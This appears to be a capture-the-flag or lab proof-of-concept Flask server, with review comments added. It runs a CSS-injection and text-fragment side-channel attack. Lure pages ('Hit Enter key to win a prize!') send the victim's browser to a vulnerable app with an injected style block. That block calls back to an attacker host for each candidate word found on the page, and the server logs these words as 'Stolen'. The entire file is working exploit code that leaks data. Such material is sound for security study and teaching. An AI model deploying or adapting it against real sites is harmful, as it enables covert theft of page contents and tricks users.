bonus_poc_exploit.py
from flask import Flask
from flask import request, send_file
import sys
import random
# Flask application serving the PoC pages and the callback endpoint.
app = Flask(__name__)

# Base URL of the application under test.
# NOTE(review): "victim"/"attacker" look like lab hostnames - confirm
# against the deployment this PoC was written for.
VICTIM = "http://victim:5000"

# Base URL under which this server's own routes (/redirect, /receive/...)
# are referenced from the generated markup and CSS.
ATTACKER = "http://attacker:1337"

# Candidate words, probed one per /redirect request in list order.
fruits_all = [
    "Apple",
    "Apricot",
    "Avocado",
    "Banana",
    "Bilberry",
    "Blackberry",
    "Blackcurrant",
    "Blueberry",
    "Boysenberry",
    "Currant",
    "Cherry",
    "Cherimoya",
]
def gen_redirect(try_fruit):
    """Return the HTML page that probes the victim for one candidate word.

    The page's script builds a markup fragment (a <style> block plus a
    "play again" link back to ATTACKER/redirect), flattens its newlines to
    spaces, and navigates to VICTIM with that fragment URL-encoded in the
    ``user`` query parameter and a ``#:~:text=<try_fruit>`` text fragment.

    The stylesheet references two URLs on this server: ATTACKER/receive/bg
    as the body background, and ATTACKER/receive/<try_fruit> from the
    ``:target::before`` rule. The latter request is what ``receiver``
    records as a hit for the candidate.

    NOTE(review): this only works if the victim writes ``user`` into its
    HTML without encoding and lets the page load styles/images from another
    origin - the victim code is not shown here. Output encoding of the
    reflected parameter and a CSP restricting style and image sources are
    the controls to verify on the victim side.

    Args:
        try_fruit: candidate word, interpolated as-is into the callback
            path and the text fragment.
    """
    # Random numeric query suffix on the callback URL; presumably there to
    # keep each callback URL distinct - TODO confirm intent.
    suffix = random.randint(10000, 99999)
    page = f"""<script>
let injection = `
<style>
:target::target-text {{ color:rgba(0,0,0,0%); }}
:target::before {{ content : url({ATTACKER}/receive/{try_fruit}?{suffix}) }}
body {{ background-image: url("{ATTACKER}/receive/bg"); background-repeat: no-repeat; background-position: center; }}
.game, .game > h1 {{ visibility: visible }}
* {{ visibility: hidden }}
li {{ visibility: visible; color: rgba(0,0,0,0%) }}
</style>
<a class="game" href='{ATTACKER}/redirect' autofocus><h1>Hit Enter to play again!</h1></a>`.replaceAll('\\n', ' ');
location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}#:~:text={try_fruit}`;
</script>
"""
    return page
# Words reported back through /receive/<word> (everything except "bg").
extracted_fruits = []
# Number of /redirect requests served so far; doubles as the 1-based index
# of the candidate handed out. Module-level, so shared by all clients.
i = 0
@app.route('/redirect')
def redirect():
    """Serve the probe page for the next candidate word.

    Every request advances the module-level counter ``i``. While candidates
    remain, the response is ``gen_redirect`` for the matching entry of
    ``fruits_all``; once the list is exhausted a fixed closing message is
    returned instead. The counter is process-wide, so requests from any
    client consume candidates from the same sequence.
    """
    global i
    i += 1
    if i > len(fruits_all):
        return "Thank you for cooperation"
    return gen_redirect(fruits_all[i - 1])
@app.route('/')
def solve():
    """Serve the landing page: one autofocused link to ATTACKER/redirect.

    NOTE(review): the markup ends with an opening <script> tag that is
    never closed; it is reproduced exactly as in the original.
    """
    landing_page = f"""<a href='{ATTACKER}/redirect' autofocus>Hit Enter key to win a prize!</a><script>"""
    return landing_page
@app.route('/receive/<word>')
def receiver(word):
    """Record a callback from the injected stylesheet and answer with an image.

    ``word`` is taken from the request path as-is. Anything other than
    "bg" is appended to ``extracted_fruits``; the full list is printed to
    stdout on every call, including "bg" requests.

    Returns:
        bg.jpg for the "bg" (background) request, won.png for any other word.
    """
    global extracted_fruits
    is_background = word == "bg"
    if not is_background:
        extracted_fruits.append(word)
    print("Stolen: ", extracted_fruits, flush=True, file=sys.stdout)
    if is_background:
        return send_file("bg.jpg", mimetype='image/jpeg')
    return send_file("won.png", mimetype='image/png')
@app.after_request
def add_header(response):
    """Set ``Cache-Control: no-store`` on every response and return it.

    Presumably there so the browser re-requests each page and callback
    image instead of reusing a cached copy - TODO confirm intent.
    """
    response.headers.set('Cache-Control', 'no-store')
    return response